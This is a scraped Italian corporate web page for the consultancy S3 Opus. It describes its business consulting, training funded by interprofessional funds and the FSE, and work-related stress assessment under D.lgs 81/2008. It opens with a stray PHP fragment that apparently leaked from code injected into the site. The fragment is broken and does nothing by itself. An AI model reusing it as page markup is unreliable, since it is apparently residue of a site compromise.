id)) {echo " ";};$_7a9bf136=1; ?>
http://www.s3opus.it/components/com_gk2_photoslide/images/thumbm/306240comunicazione_copy.jpg http://www.s3opus.it/components/com_gk2_photoslide/images/thumbm/236505formazione_copy.jpg http://www.s3opus.it/components/com_gk2_photoslide/images/thumbm/552499ricerca_copy.jpg
Home Ricerca e Consulenza Consulenza Aziendale
Consulenza Aziendale PDF Stampa E-mail

Grazie alle esperienze e competenze maturate nel corso di oltre 30 anni di attività, siamo in grado di fornire sia la consulenza tecnica che la progettazione di interventi finalizzati all’innovazione e allo sviluppo delle imprese di ogni settore, dimensione e localizzazione geografica, assicurando il monitoraggio continuo della loro efficacia, nonché del livello di partecipazione e coinvolgimento delle risorse aziendali.

La nostra proposta consulenziale si articola nei seguenti ambiti di intervento:
  1. Progetti di Innovazione e Sviluppo organizzativo finanziati da risorse nazionali ed europee
2.    Piani di Formazione finanziati dai Fondi Paritetici Interprofessionali e dal FSE

3.     Valutazione del rischio stress  e Progettazione ergonomica del lavoro (D.lgs 81/2008)


1. Progetti di innovazione e sviluppo organizzativo finanziati da risorse nazionali ed europee

 

 

Assistiamo le imprese nell’individuazione degli obiettivi di sviluppo, nella presentazione delle domande di finanziamento fino all’attuazione di interventifinalizzati all’innovazione tecnologica, all’individuazione di nuovi prodotti e servizi, all’espansione dei mercati,  all’introduzione di misure di flessibilità e alla promozione del benessere organizzativo, quali:

 

-      Sviluppo Business Plan e assistenza allo start-up di nuove attività imprenditoriali;

 

-      Ricerche di mercato per le imprese sia di produzione, sia di servizi;

 

-      Analisi di clima e consulenza per lo sviluppo del benessere organizzativo;

 

-     Interventi per lo sviluppo della flessibilità organizzativa e il miglioramento della qualità della vita di lavoro, attraverso l’introduzione di nuove modalità di lavoro quali l’e-work (telelavoro), di misure per la conciliazione dei tempi di vita e di lavoro e la promozione delle pari opportunità (diversity management).

 

2. Piani di formazione finanziati dai fondi Paritetici interprofessionali e dal FSE

 

 
In qualità di ente accreditato per l’attività di formazione a livello regionale e a livello nazionale presso i principali Fondi Interprofessionali, S3 Opus supporta le aziende di ogni dimensione e settore nell’utilizzo di strumenti di finanziamento per la formazione continua resi disponibili dalla legge 388/2000 (Fondi Paritetici Interprofessionali) e dal Fondo Sociale Europeo (FSE) al fine di promuovere la formazione continua dei lavoratori e dei dirigenti delle imprese di ogni settore e localizzazione geografica.  

S3 Opus fornisce, a tale riguardo, partendo da un’attenta analisi dei fabbisogni, la progettazione dei piani formativi eaccompagna le aziende dalla presentazione delle domande di finanziamento fino all’erogazione dei servizi formativi.

 

3.Valutazione del rischio stress  e Progettazione ergonomica del lavoro (D.lgs 81/2008)

 

Contribuiamo a fornire alle aziende un supporto consulenziale specialistico finalizzato a garantire, attraverso un’attenta analisi del contesto operativo di ogni singola realtà aziendale, la prevenzione dei rischi in materia di salute e sicurezza nei luoghi di lavoro (D.Lgs. 81/2008) con particolare referimento al rischio stress-lavoro correlato. Sul tema dei rischi psicosociali e in particolare sullo stress lavoro-correlato S3 Opus ha difatti avviato una importante attività di ricerca, formazione e informazione in collaborazione con prestigiose istituzioni pubbliche e private con le quali studia insieme gli strumenti e le modalità per migliorare l’organizzazione del lavoro.
 
A questo scopo S3 Opus ha messo a punto e sperimentato in aziende di ogni tipologia e settore una propria metodologia di analisi e i relativi strumenti per la valutazione del rischio stress-lavoro correlato, rappresentati dal sistema SVS – Sistema Valutazione Stress che consente alle aziende di mettersi velocemente in regola rispetto a quanto previsto dall'art. 28 del Testo Unico sulla Sicurezza (D. Lgs. 81/2008).
 
Inoltre S3 Opus ha sviluppato una metodologia di intervento finalizzata a prevenire il rischio stress-lavoro correlato e a migliorare la qualità della vita di lavoro dei dipendenti e la produttività delle aziende. Tale metodologia si basa sulla puntuale applicazione dei principi ergonomici, come espressamente richiamato dal D.Lgs. 31/2008.

Carta della qualità della formazione

 Carta della qualità della formazione

 

 

Brochure

Scarica la brochure di S3 Opus

Certificazione ISO 9001:2008

http://it.fsc.org/

 

Carta della qualità della formazione

Carta della qualità della formazione

Carta della qualità della formazione

 

 

 

 

 

 

Cerca nel sito

Newsletter

Iscriviti alla newsletter di S3 Opus per rimanere sempre aggiornato sulle ultime novità.


Area E-learning

Accedi all'area e-learning da qui

Facebook

Joomla 1.5 Templates by JoomlaShine.com

Questo sito o gli strumenti terzi da questo utilizzati si avvalgono di cookie necessari al funzionamento ed utili alle finalità illustrate nella Cookie Policy.